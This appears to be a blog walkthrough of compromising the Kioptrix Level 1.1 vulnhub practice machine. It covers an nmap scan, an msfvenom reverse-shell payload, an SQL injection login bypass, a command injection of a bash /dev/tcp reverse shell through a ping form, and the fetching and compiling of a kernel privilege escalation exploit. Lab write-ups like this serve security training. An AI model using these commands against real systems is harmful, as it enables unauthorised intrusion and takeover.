Kioptrix: Level 1.1 (#2) walkthrough

This is a walkthrough of the Kioptrix: Level 1.1 (#2) vulnhub machine. Original link here:,23/

The scan:

root@kali:~# nmap -sT -A -O -p-

Starting Nmap 7.50 ( ) at 2018-02-24 07:35 EST
Nmap scan report for
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 625/udp status
|_ 100024 1 628/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2018-02-24T10:26:27+00:00; -2h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
628/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:47:D4:2E (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 – 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Network Distance: 1 hop

First I tried exploiting port 631, which is the Linux printing service, CUPS, version 1.1

Searching for the exploit:

root@kali:~/junk/kioptrix1.2# searchsploit cups 1.1
——————————————— ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
——————————————— ———————————-
CUPS 1.1.x – ‘.HPGL’ File Processor Buffer O | linux/remote/24977.txt
CUPS 1.1.x – Cupsd Request Method Denial of | linux/dos/22619.txt
CUPS 1.1.x – Negative Length HTTP Header | linux/remote/22106.txt
CUPS 1.1.x – UDP Packet Remote Denial of Ser | linux/dos/24599.txt
CUPS Server 1.1 – GET Request Denial of Serv | linux/dos/1196.c
——————————————— ———————————-

Generating the shell:

The exploit needs an .so payload, so I try it.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=8443 -f elf-so >>
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf-so file: 369 bytes

For some reason, the exploit fails. Moving along.

Port 80 is open. we have an authentication form. Trying to bypass the authentication via SQL injection and it works:

Authentication is bypassed.

We are presented with a ping form, that should allow us to ping a network node.

We try command execution on it, while we setup a netcat listener on port 777 of our attacking machine.;bash -i >& /dev/tcp/ 0>&1

It works:

To privesc this we try the unix-privesc-script but no success.

Eventually I got it with a kernel exploit.

curl -k -o 9542.c

Compile it:

bash-3.00$ gcc -o 0x82-CVE-2009-2698 ./9542.c
./9542.c:109:28: warning: no newline at end of file

Run it:

Posted in hacking, vulnhub. Tagged with , , .

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.